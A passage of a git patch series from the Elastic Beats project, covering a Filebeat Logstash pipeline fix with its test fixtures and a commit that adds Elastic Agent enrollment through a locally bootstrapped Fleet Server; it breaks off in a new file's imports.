if: ctx?.logstash?.log?.log_event?.action instanceof List + lang: painless + source: | + def items = []; + ctx.logstash.log.log_event.action.forEach(v -> { + items.add(v.toString()); + }); + ctx.logstash.log.log_event.action = items; - set: field: event.kind value: event diff --git a/filebeat/module/logstash/log/test/logstash-json.log b/filebeat/module/logstash/log/test/logstash-json.log index bfd931653ab8..503d6ce24498 100644 --- a/filebeat/module/logstash/log/test/logstash-json.log +++ b/filebeat/module/logstash/log/test/logstash-json.log @@ -1,3 +1,4 @@ {"level":"INFO","loggerName":"logstash.agent","timeMillis":1546896321871,"thread":"Ruby-0-Thread-1: /Users/mat/work/elastic/releases/6.5.1/logstash/lib/bootstrap/environment.rb:6","logEvent":{"message":"Pipelines running","count":1,"running_pipelines":[{"metaClass":{"metaClass":{"metaClass":{"running_pipelines":"[:main]","non_running_pipelines":[]}}}}]}} {"level":"INFO","loggerName":"logstash.pipeline","timeMillis":1546896322538,"thread":"[main]>worker7","logEvent":{"message":"Pipeline has terminated","pipeline_id":"main","thread":"#"}} {"level":"INFO","loggerName":"logstash.agent","timeMillis":1546896322594,"thread":"Api Webserver","logEvent":{"message":"Successfully started Logstash API endpoint","port":9600}} +{"level":"WARN","loggerName":"logstash.outputs.elasticsearch","timeMillis":1612827484046,"thread":"[foo]>worker1","logEvent":{"message":"Could not index event to Elasticsearch.","status":400,"action":["update",{"_id":"foo-1234abcd-96c6-4828-bcd4-51d33a156431","_index":"filebeat-foo-2021.02","_type":"_doc","retry_on_conflict":1},{"metaClass":{"metaClass":{"metaClass":{"action":"[\"update\", {:_id=>\"foo-1234abcd-96c6-4828-bcd4-51d33a156431\", :_index=>\"filebeat-foo-2021.02\", :routing=>nil, :_type=>\"_doc\", :retry_on_conflict=>1}, #]","response":{"update":{"_index":"filebeat-foo-2021.02","_type":"_doc","_id":"foo-1234abcd-96c6-4828-bcd4-51d33a156431","status":400,"error":{"type":"mapper_parsing_exception","reason":"failed to parse field [bar] of type [long] in document with id 'foo-1234abcd-96c6-4828-bcd4-51d33a156431'. Preview of field's value: 'ABCDEFGHIJ'","caused_by":{"type":"illegal_argument_exception","reason":"For input string: \"ABCDEFGHIJ\""}}}}}}}}]}} diff --git a/filebeat/module/logstash/log/test/logstash-json.log-expected.json b/filebeat/module/logstash/log/test/logstash-json.log-expected.json index 4bbf77ad25f2..9cf6c292e391 100644 --- a/filebeat/module/logstash/log/test/logstash-json.log-expected.json +++ b/filebeat/module/logstash/log/test/logstash-json.log-expected.json @@ -59,5 +59,26 @@ "logstash.log.thread": "Api Webserver", "message": "Successfully started Logstash API endpoint", "service.type": "logstash" + }, + { + "@timestamp": "2021-02-08T23:38:04.046Z", + "event.dataset": "logstash.log", + "event.kind": "event", + "event.module": "logstash", + "event.type": "info", + "fileset.name": "log", + "input.type": "log", + "log.level": "WARN", + "log.offset": 745, + "logstash.log.log_event.action": [ + "update", + "{_index=filebeat-foo-2021.02, _type=_doc, _id=foo-1234abcd-96c6-4828-bcd4-51d33a156431, retry_on_conflict=1}", + "{metaClass={metaClass={metaClass={response={update={_index=filebeat-foo-2021.02, _type=_doc, _id=foo-1234abcd-96c6-4828-bcd4-51d33a156431, error={reason=failed to parse field [bar] of type [long] in document with id 'foo-1234abcd-96c6-4828-bcd4-51d33a156431'. Preview of field's value: 'ABCDEFGHIJ', caused_by={reason=For input string: \"ABCDEFGHIJ\", type=illegal_argument_exception}, type=mapper_parsing_exception}, status=400}}, action=[\"update\", {:_id=>\"foo-1234abcd-96c6-4828-bcd4-51d33a156431\", :_index=>\"filebeat-foo-2021.02\", :routing=>nil, :_type=>\"_doc\", :retry_on_conflict=>1}, #]}}}}" + ], + "logstash.log.log_event.status": 400, + "logstash.log.module": "logstash.outputs.elasticsearch", + "logstash.log.thread": "[foo]>worker1", + "message": "Could not index event to Elasticsearch.", + "service.type": "logstash" } ] \ No newline at end of file From ae0f29ec06ce2e3b1fa753e7f732ed238fb19b44 Mon Sep 17 00:00:00 2001 From: Blake Rouse Date: Tue, 16 Feb 2021 09:56:48 -0500 Subject: [PATCH 54/63] [Elastic Agent] Enroll with Fleet Server (#23865) * Add test and changelog. * Add ability to enroll through a local Fleet Server started by the running Elastic Agent daemon. * Fix tests. * Fix changelog. * Fixes from code review. * Cleanup from merge into master. --- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + .../pkg/agent/application/application.go | 72 +++++- .../pkg/agent/application/config.go | 23 ++ .../pkg/agent/application/enroll_cmd.go | 215 +++++++++++++++++- .../pkg/agent/application/enroll_cmd_test.go | 11 +- .../pkg/agent/application/fleet_gateway.go | 31 ++- .../agent/application/fleet_gateway_local.go | 109 +++++++++ .../agent/application/fleet_gateway_test.go | 12 +- .../application/fleet_server_bootstrap.go | 213 +++++++++++++++++ .../pkg/agent/application/local_mode.go | 7 +- .../pkg/agent/application/managed_mode.go | 68 ++---- .../application/noop_status_controller.go | 17 +- .../pkg/agent/application/upgrade/upgrade.go | 2 +- x-pack/elastic-agent/pkg/agent/cmd/enroll.go | 124 +++++----- x-pack/elastic-agent/pkg/agent/cmd/install.go | 46 ++-- x-pack/elastic-agent/pkg/agent/cmd/run.go | 8 +- .../pkg/agent/configuration/fleet.go | 6 + .../pkg/agent/configuration/fleet_server.go | 68 ++++++ .../pkg/agent/control/control_test.go | 27 ++- .../pkg/agent/control/server/server.go | 55 +++-- .../elastic-agent/pkg/agent/errors/error.go | 6 + .../pkg/agent/errors/error_test.go | 43 ---- .../pkg/agent/errors/generators.go | 15 -- .../pkg/agent/install/install.go | 16 ++ .../pkg/agent/operation/operator.go | 21 +- .../pkg/agent/operation/operator_test.go | 22 +- .../pkg/agent/program/program.go | 73 +++--- .../pkg/agent/program/supported.go | 2 +- .../pkg/basecmd/version/cmd_test.go | 4 +- .../pkg/capabilities/capabilities.go | 6 +- .../pkg/capabilities/capabilities_test.go | 14 +- .../elastic-agent/pkg/capabilities/input.go | 7 +- .../pkg/capabilities/input_test.go | 7 +- .../elastic-agent/pkg/capabilities/output.go | 7 +- .../elastic-agent/pkg/capabilities/upgrade.go | 7 +- .../elastic-agent/pkg/core/logger/logger.go | 2 +- .../pkg/core/plugin/process/app.go | 54 ++--- .../pkg/core/plugin/process/configure.go | 5 +- .../pkg/core/plugin/process/status.go | 2 +- .../pkg/core/plugin/service/app.go | 60 ++--- x-pack/elastic-agent/pkg/core/state/state.go | 60 +++-- .../elastic-agent/pkg/core/status/reporter.go | 195 +++++++++++----- .../pkg/core/status/reporter_test.go | 83 +++---- x-pack/elastic-agent/pkg/reporter/reporter.go | 2 +- .../pkg/reporter/reporter_test.go | 6 +- x-pack/elastic-agent/spec/fleet-server.yml | 4 + 46 files changed, 1335 insertions(+), 503 deletions(-) create mode 100644 x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go create mode 100644 x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go create mode 100644 x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index cce864723f3a..3f0419ca38d7 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -69,3 +69,4 @@ - Push log level downstream {pull}22815[22815] - Add metrics collection for Agent {pull}22793[22793] - Add support for Fleet Server {pull}23736[23736] +- Add support for enrollment with local bootstrap of Fleet Server {pull}23865[23865] diff --git a/x-pack/elastic-agent/pkg/agent/application/application.go b/x-pack/elastic-agent/pkg/agent/application/application.go index af50477d5fda..c13157e02f52 100644 --- a/x-pack/elastic-agent/pkg/agent/application/application.go +++ b/x-pack/elastic-agent/pkg/agent/application/application.go @@ -6,6 +6,11 @@ package application import ( "context" + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" @@ -31,7 +36,7 @@ type upgraderControl interface { } // New creates a new Agent and bootstrap the required subsystem. -func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, uc upgraderControl, agentInfo *info.AgentInfo) (Application, error) { +func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo) (Application, error) { // Load configuration from disk to understand in which mode of operation // we must start the elastic-agent, the mode of operation cannot be changed without restarting the // elastic-agent. @@ -44,7 +49,7 @@ func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, uc upg return nil, err } - return createApplication(log, pathConfigFile, rawConfig, reexec, uc, agentInfo) + return createApplication(log, pathConfigFile, rawConfig, reexec, statusCtrl, uc, agentInfo) } func createApplication( @@ -52,6 +57,7 @@ func createApplication( pathConfigFile string, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo, ) (Application, error) { @@ -66,14 +72,72 @@ func createApplication( if IsStandalone(cfg.Fleet) { log.Info("Agent is managed locally") - return newLocal(ctx, log, pathConfigFile, rawConfig, reexec, uc, agentInfo) + return newLocal(ctx, log, pathConfigFile, rawConfig, reexec, statusCtrl, uc, agentInfo) + } + + // not in standalone; both modes require reading the fleet.yml configuration file + var store storage.Store + store, cfg, err = mergeFleetConfig(rawConfig) + + if IsFleetServerBootstrap(cfg.Fleet) { + log.Info("Agent is in Fleet Server bootstrap mode") + return newFleetServerBootstrap(ctx, log, pathConfigFile, rawConfig, statusCtrl, agentInfo) } log.Info("Agent is managed by Fleet") - return newManaged(ctx, log, rawConfig, reexec, agentInfo) + return newManaged(ctx, log, store, cfg, rawConfig, reexec, statusCtrl, agentInfo) } // IsStandalone decides based on missing of fleet.enabled: true or fleet.{access_token,kibana} will place Elastic Agent into standalone mode. func IsStandalone(cfg *configuration.FleetAgentConfig) bool { return cfg == nil || !cfg.Enabled } + +// IsFleetServerBootstrap decides if Elastic Agent is started in bootstrap mode. +func IsFleetServerBootstrap(cfg *configuration.FleetAgentConfig) bool { + return cfg != nil && cfg.Server != nil && cfg.Server.Bootstrap +} + +func mergeFleetConfig(rawConfig *config.Config) (storage.Store, *configuration.Configuration, error) { + path := info.AgentConfigFile() + store := storage.NewDiskStore(path) + reader, err := store.Load() + if err != nil { + return store, nil, errors.New(err, "could not initialize config store", + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + config, err := config.NewConfigFrom(reader) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + // merge local configuration and configuration persisted from fleet. + err = rawConfig.Merge(config) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to merge configuration with %s for the elastic-agent", path), + errors.TypeConfig, + errors.M(errors.MetaKeyPath, path)) + } + + cfg, err := configuration.NewFromConfig(rawConfig) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to unpack configuration from %s", path), + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + if err := cfg.Fleet.Valid(); err != nil { + return store, nil, errors.New(err, + "fleet configuration is invalid", + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + return store, cfg, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/config.go b/x-pack/elastic-agent/pkg/agent/application/config.go index 8dfd093e040f..d0eb80449a21 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config.go +++ b/x-pack/elastic-agent/pkg/agent/application/config.go @@ -26,3 +26,26 @@ func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*conf } return cfg, nil } + +func createFleetServerBootstrapConfig(connStr string, policyID string) (*configuration.FleetAgentConfig, error) { + es, err := configuration.ElasticsearchFromConnStr(connStr) + if err != nil { + return nil, err + } + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.Server = &configuration.FleetServerConfig{ + Bootstrap: true, + Output: configuration.FleetServerOutputConfig{ + Elasticsearch: es, + }, + } + if policyID != "" { + cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} + } + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) + } + return cfg, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go index fe4cafa75941..82d996bd620a 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go @@ -9,9 +9,15 @@ import ( "context" "fmt" "io" + "math/rand" "net/http" "net/url" "os" + "time" + + "github.com/elastic/beats/v7/libbeat/common/backoff" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "gopkg.in/yaml.v2" @@ -25,6 +31,16 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) +const ( + waitingForAgent = "waiting for Elastic Agent to start" + waitingForFleetServer = "waiting for Elastic Agent to start Fleet Server" +) + +var ( + enrollDelay = 1 * time.Second // max delay to start enrollment + daemonTimeout = 30 * time.Second // max amount of for communication to running Agent daemon +) + type store interface { Save(io.Reader) error } @@ -66,6 +82,9 @@ type EnrollCmdOption struct { UserProvidedMetadata map[string]interface{} EnrollAPIKey string Staging string + FleetServerConnStr string + FleetServerPolicyID string + NoRestart bool } func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { @@ -149,7 +168,95 @@ func NewEnrollCmdWithStore( } // Execute tries to enroll the agent into Fleet. -func (c *EnrollCmd) Execute() error { +func (c *EnrollCmd) Execute(ctx context.Context) error { + if c.options.FleetServerConnStr != "" { + err := c.fleetServerBootstrap(ctx) + if err != nil { + return err + } + + // enroll should use localhost as fleet-server is now running + // it must also restart + c.options.URL = "http://localhost:8000" + c.options.NoRestart = false + } + + err := c.enrollWithBackoff(ctx) + if err != nil { + return errors.New(err, "fail to enroll") + } + + if c.options.NoRestart { + return nil + } + + if c.daemonReload(ctx) != nil { + c.log.Info("Elastic Agent might not be running; unable to trigger restart") + } + c.log.Info("Successfully triggered restart on running Elastic Agent.") + return nil +} + +func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { + c.log.Debug("verifying communication with running Elastic Agent daemon") + _, err := getDaemonStatus(ctx) + if err != nil { + return errors.New("failed to communicate with elastic-agent daemon; is elastic-agent running?") + } + + fleetConfig, err := createFleetServerBootstrapConfig(c.options.FleetServerConnStr, c.options.FleetServerPolicyID) + configToStore := map[string]interface{}{ + "fleet": fleetConfig, + } + reader, err := yamlToReader(configToStore) + if err != nil { + return err + } + if err := c.configStore.Save(reader); err != nil { + return errors.New(err, "could not save fleet server bootstrap information", errors.TypeFilesystem) + } + + err = c.daemonReload(ctx) + if err != nil { + return errors.New(err, "failed to trigger elastic-agent daemon reload", errors.TypeApplication) + } + + err = waitForFleetServer(ctx, c.log) + if err != nil { + return errors.New(err, "fleet-server never started by elastic-agent daemon", errors.TypeApplication) + } + return nil +} + +func (c *EnrollCmd) daemonReload(ctx context.Context) error { + daemon := client.New() + err := daemon.Connect(ctx) + if err != nil { + return err + } + defer daemon.Disconnect() + return daemon.Restart(ctx) +} + +func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { + delay(ctx, enrollDelay) + + err := c.enroll(ctx) + signal := make(chan struct{}) + backExp := backoff.NewExpBackoff(signal, 60*time.Second, 10*time.Minute) + + for errors.Is(err, fleetapi.ErrTooManyRequests) { + c.log.Warn("Too many requests on the remote server, will retry in a moment.") + backExp.Wait() + c.log.Info("Retrying to enroll...") + err = c.enroll(ctx) + } + + close(signal) + return err +} + +func (c *EnrollCmd) enroll(ctx context.Context) error { cmd := fleetapi.NewEnrollCmd(c.client) metadata, err := metadata() @@ -167,7 +274,7 @@ func (c *EnrollCmd) Execute() error { }, } - resp, err := cmd.Execute(context.Background(), r) + resp, err := cmd.Execute(ctx, r) if err != nil { return errors.New(err, "fail to execute request to Kibana", @@ -184,6 +291,15 @@ func (c *EnrollCmd) Execute() error { "sourceURI": staging, } } + if c.options.FleetServerConnStr != "" { + serverConfig, err := createFleetServerBootstrapConfig(c.options.FleetServerConnStr, c.options.FleetServerPolicyID) + if err != nil { + return err + } + // no longer need bootstrap at this point + serverConfig.Server.Bootstrap = false + fleetConfig.Server = serverConfig.Server + } configToStore := map[string]interface{}{ "fleet": fleetConfig, @@ -225,3 +341,98 @@ func yamlToReader(in interface{}) (io.Reader, error) { } return bytes.NewReader(data), nil } + +func delay(ctx context.Context, d time.Duration) { + t := time.NewTimer(time.Duration(rand.Int63n(int64(d)))) + defer t.Stop() + select { + case <-ctx.Done(): + case <-t.C: + } +} + +func getDaemonStatus(ctx context.Context) (*client.AgentStatus, error) { + ctx, cancel := context.WithTimeout(ctx, daemonTimeout) + defer cancel() + daemon := client.New() + err := daemon.Connect(ctx) + if err != nil { + return nil, err + } + defer daemon.Disconnect() + return daemon.Status(ctx) +} + +type waitResult struct { + err error +} + +func waitForFleetServer(ctx context.Context, log *logger.Logger) error { + ctx, cancel := context.WithTimeout(ctx, 2*time.Minute) + defer cancel() + + resChan := make(chan waitResult) + innerCtx, innerCancel := context.WithCancel(context.Background()) + defer innerCancel() + go func() { + msg := "" + for { + <-time.After(1 * time.Second) + status, err := getDaemonStatus(innerCtx) + if err == context.Canceled { + resChan <- waitResult{err: err} + return + } + if err != nil { + log.Debug(waitingForAgent) + if msg != waitingForAgent { + msg = waitingForAgent + log.Info(waitingForAgent) + } + continue + } + app := getAppFromStatus(status, "fleet-server") + if app == nil { + log.Debug(waitingForFleetServer) + if msg != waitingForFleetServer { + msg = waitingForFleetServer + log.Info(waitingForFleetServer) + } + continue + } + log.Debugf("fleet-server status: %s - %s", app.Status, app.Message) + if app.Status == proto.Status_DEGRADED || app.Status == proto.Status_HEALTHY { + // app has started and is running + resChan <- waitResult{} + break + } + appMsg := fmt.Sprintf("Fleet Server - %s", app.Message) + if msg != appMsg { + msg = appMsg + log.Info(appMsg) + } + } + }() + + var res waitResult + select { + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } + + if res.err != nil { + return res.err + } + return nil +} + +func getAppFromStatus(status *client.AgentStatus, name string) *client.ApplicationStatus { + for _, app := range status.Applications { + if app.Name == name { + return app + } + } + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go index 080b5efcb699..fe6786276d24 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go @@ -6,6 +6,7 @@ package application import ( "bytes" + "context" "crypto/tls" "io" "io/ioutil" @@ -94,7 +95,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.Error(t, err) }, )) @@ -147,7 +148,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) config, err := readConfig(store.Content) @@ -205,7 +206,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) require.True(t, store.Called) @@ -265,7 +266,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.NoError(t, err) require.True(t, store.Called) @@ -310,7 +311,7 @@ func TestEnroll(t *testing.T) { ) require.NoError(t, err) - err = cmd.Execute() + err = cmd.Execute(context.Background()) require.Error(t, err) require.False(t, store.Called) }, diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go index 0ec71d7a5fa7..225c50e65e68 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go @@ -6,9 +6,12 @@ package application import ( "context" + "fmt" "sync" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -57,10 +60,18 @@ type fleetAcker interface { Commit(ctx context.Context) error } -// fleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the +// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the // bidirectional communication requirements. The gateway aggregates events and will periodically // call the API to send the events and will receive actions to be executed locally. // The only supported action for now is a "ActionPolicyChange". +type FleetGateway interface { + // Start starts the gateway. + Start() error + + // Set the client for the gateway. + SetClient(clienter) +} + type fleetGateway struct { bgContext context.Context log *logger.Logger @@ -90,7 +101,7 @@ func newFleetGateway( acker fleetAcker, statusController status.Controller, stateStore *stateStore, -) (*fleetGateway, error) { +) (FleetGateway, error) { scheduler := scheduler.NewPeriodicJitter(defaultGatewaySettings.Duration, defaultGatewaySettings.Jitter) return newFleetGatewayWithScheduler( @@ -120,7 +131,7 @@ func newFleetGatewayWithScheduler( acker fleetAcker, statusController status.Controller, stateStore *stateStore, -) (*fleetGateway, error) { +) (FleetGateway, error) { // Backoff implementation doesn't support the using context as the shutdown mechanism. // So we keep a done channel that will be closed when the current context is shutdown. @@ -142,7 +153,7 @@ func newFleetGatewayWithScheduler( done: done, reporter: r, acker: acker, - statusReporter: statusController.Register("gateway"), + statusReporter: statusController.RegisterComponent("gateway"), statusController: statusController, stateStore: stateStore, }, nil @@ -160,7 +171,7 @@ func (f *fleetGateway) worker() { resp, err := f.doExecute() if err != nil { f.log.Error(err) - f.statusReporter.Update(status.Failed) + f.statusReporter.Update(state.Failed, err.Error()) continue } @@ -170,12 +181,13 @@ func (f *fleetGateway) worker() { } if err := f.dispatcher.Dispatch(f.acker, actions...); err != nil { - f.log.Errorf("failed to dispatch actions, error: %s", err) - f.statusReporter.Update(status.Degraded) + msg := fmt.Sprintf("failed to dispatch actions, error: %s", err) + f.log.Error(msg) + f.statusReporter.Update(state.Degraded, msg) } f.log.Debugf("FleetGateway is sleeping, next update in %s", f.settings.Duration) - f.statusReporter.Update(status.Healthy) + f.statusReporter.Update(state.Healthy, "") case <-f.bgContext.Done(): f.stop() return @@ -270,7 +282,7 @@ func isUnauth(err error) bool { return errors.Is(err, fleetapi.ErrInvalidAPIKey) } -func (f *fleetGateway) Start() { +func (f *fleetGateway) Start() error { f.wg.Add(1) go func(wg *sync.WaitGroup) { defer f.log.Info("Fleet gateway is stopped") @@ -278,6 +290,7 @@ func (f *fleetGateway) Start() { f.worker() }(&f.wg) + return nil } func (f *fleetGateway) stop() { diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go new file mode 100644 index 000000000000..e25e7792fb19 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go @@ -0,0 +1,109 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package application + +import ( + "context" + "time" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +const gatewayWait = 2 * time.Second + +var injectFleetServerInput = map[string]interface{}{ + // outputs is replaced by the fleet-server.spec + "outputs": map[string]interface{}{ + "default": map[string]interface{}{ + "type": "elasticsearch", + "hosts": []string{"localhost:9200"}, + }, + }, + "inputs": []interface{}{ + map[string]interface{}{ + "type": "fleet-server", + }, + }, +} + +// fleetServerWrapper wraps the fleetGateway to ensure that a local Fleet Server is running before trying +// to communicate with the gateway, which is local to the Elastic Agent. +type fleetServerWrapper struct { + bgContext context.Context + log *logger.Logger + cfg *configuration.FleetAgentConfig + injectedCfg *config.Config + wrapped FleetGateway + emitter emitterFunc +} + +func wrapLocalFleetServer( + ctx context.Context, + log *logger.Logger, + cfg *configuration.FleetAgentConfig, + rawConfig *config.Config, + wrapped FleetGateway, + emitter emitterFunc) (FleetGateway, error) { + if cfg.Server == nil { + // not running a local Fleet Server + return wrapped, nil + } + injectedCfg, err := injectFleetServer(rawConfig) + if err != nil { + return nil, errors.New(err, "failed to inject fleet-server input to start local Fleet Server", errors.TypeConfig) + } + return &fleetServerWrapper{ + bgContext: ctx, + log: log, + cfg: cfg, + injectedCfg: injectedCfg, + wrapped: wrapped, + emitter: emitter, + }, nil +} + +// Start starts the gateway. +func (w *fleetServerWrapper) Start() error { + err := w.emitter(w.injectedCfg) + if err != nil { + return err + } + sleep(w.bgContext, gatewayWait) + return w.wrapped.Start() +} + +// SetClient sets the client for the wrapped gateway. +func (w *fleetServerWrapper) SetClient(client clienter) { + w.wrapped.SetClient(client) +} + +func injectFleetServer(rawConfig *config.Config) (*config.Config, error) { + cfg := map[string]interface{}{} + err := rawConfig.Unpack(cfg) + if err != nil { + return nil, err + } + cloned, err := config.NewConfigFrom(cfg) + if err != nil { + return nil, err + } + err = cloned.Merge(injectFleetServerInput) + if err != nil { + return nil, err + } + return cloned, nil +} + +func sleep(ctx context.Context, d time.Duration) { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + case <-t.C: + } +} diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go index a31f6a343a2c..4af4836936eb 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go @@ -105,7 +105,7 @@ func newTestingDispatcher() *testingDispatcher { return &testingDispatcher{received: make(chan struct{}, 1)} } -type withGatewayFunc func(*testing.T, *fleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) +type withGatewayFunc func(*testing.T, FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGatewayFunc) func(t *testing.T) { return func(t *testing.T) { @@ -172,7 +172,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send no event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -197,7 +197,7 @@ func TestFleetGateway(t *testing.T) { t.Run("Successfully connects and receives a series of actions", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -292,7 +292,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -404,7 +404,7 @@ func TestRetriesOnFailures(t *testing.T) { t.Run("When the gateway fails to communicate with the checkin API we will retry", withGateway(agentInfo, settings, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -460,7 +460,7 @@ func TestRetriesOnFailures(t *testing.T) { Backoff: backoffSettings{Init: 10 * time.Minute, Max: 20 * time.Minute}, }, func( t *testing.T, - gateway *fleetGateway, + gateway FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go new file mode 100644 index 000000000000..ebdb65ff7069 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go @@ -0,0 +1,213 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package application + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/go-sysinfo" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + 